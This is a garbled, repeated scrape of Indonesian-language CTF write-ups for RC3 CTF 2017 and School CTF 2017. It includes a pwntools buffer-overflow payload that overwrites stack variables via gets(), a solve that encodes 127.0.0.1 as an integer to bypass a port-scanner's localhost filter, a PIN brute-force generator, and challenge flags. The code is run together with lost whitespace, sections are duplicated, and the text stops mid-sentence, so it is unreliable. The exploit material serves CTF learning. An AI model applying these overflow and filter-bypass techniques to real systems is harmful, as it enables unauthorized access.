RC3 CTF 2017 - Write Up
v2 = 0; v1 = 0; printf(“Enter Key: “); gets((char *)&v0); if ( v2 == 0xCAFEF00D && v1 == 0xC0FFEE ) sub_80484EF(); puts(“Error: Invalid key!"); srand(1u); init(); } baby=remote("18.216.183.46",4200)p="“p+="A"*16p+=p32(0xC0FFEE)# v1p+=p32(0xCAFEF00D)# v2baby.sendlineafter(”: “,p)printbaby.
RC3 CTF 2017 Write Up
Reversing (100) Diberikan file elf 64bit not stripped.
$ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped Hanya dengan menggunakan strings didapatkan Flag yang benar.
$ strings hello | grep RC RC3-2017{little_ball_of_fur} Cukup mudah untuk challenge dengan points 100 :)
Flag : RC3-2017{little_ball_of_fur}
Web (100) Diberikan sebuah website http://13.59.6.98
$ curl http://13.59.6.98 <meta http-equiv="refresh" content="0; url=C.html" /> <p hidden>R</p> Website tersebut akan otomatis direfresh apabila dikunjungi via Browser.
RC3 CTF 2017 Write Up
Reversing (100) Diberikan file elf 64bit not stripped.
$ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped Hanya dengan menggunakan strings didapatkan Flag yang benar.
$ strings hello | grep RC RC3-2017{little_ball_of_fur} Cukup mudah untuk challenge dengan points 100 :) Flag : RC3-2017{little_ball_of_fur}
Web (100) Diberikan sebuah website ()[http://13.59.6.98]
$ curl http://13.59.6.98 <meta http-equiv="refresh" content="0; url=C.html" /> <p hidden>R</p> Website tersebut akan otomatis direfresh apabila dikunjungi via Browser.
School CTF 2017 - Write Up
Task URLCan you find it?
Task URLdefip2long(ip): aton =inet_aton(ip) returnunpack(”!L",aton)[0]
defmain(): URL ="http://portscan.task.school-CTF.org/port"IP ="127.0.0.1"HOST =ip2long(IP) PORT ="31337"print"Host : {}“.format(HOST) r =requests.post(URL,data={"host": HOST,"port": PORT}) raw_content =r.content flag =re.findall("SchoolCTF{.*?}“,raw_content) print"Flag : {}“.format(flag[0]) if__name__==’main‘: main() p.s. It seems that one of them said that they haven’t yet fully configured the security system and the password can be cracked. Safe URLdefa(pin): if(int(pin[0]) +int(pin[1]) +int(pin[2])) %10==int(pin[3]): returnpin else: returnNonepin_list =[] prod_pin =product("123456789",repeat=4) prod_pin =["“.join(x) forx inlist(prod_pin)] prod_pin =map(a,prod_pin) prod_pin =filter(None,prod_pin) prod_pin =list(set(prod_pin)) pin_list+=prod_pin
School CTF 2017 Write Up
Task URLSitus tersebut menggunakan self signed ssl, dan Flag nya terdapat pada bagian Organizational unit (OU).
Flag : SchoolCTF{n0t_so+$eCur3}Can you find it?
Task URLWeb tersebut menyediakan fasilitas scan port. dimana terdapat 2 fitur,
yang pertama ‘Scan the host to get the list of open ports’
terlihat port 31337 dengan service SchoolCTF Flag Serverdalam keadaan Open.
Yang kedua “Identify the single port on the host”
Tetapi apabila me scan “localhost” atau “127.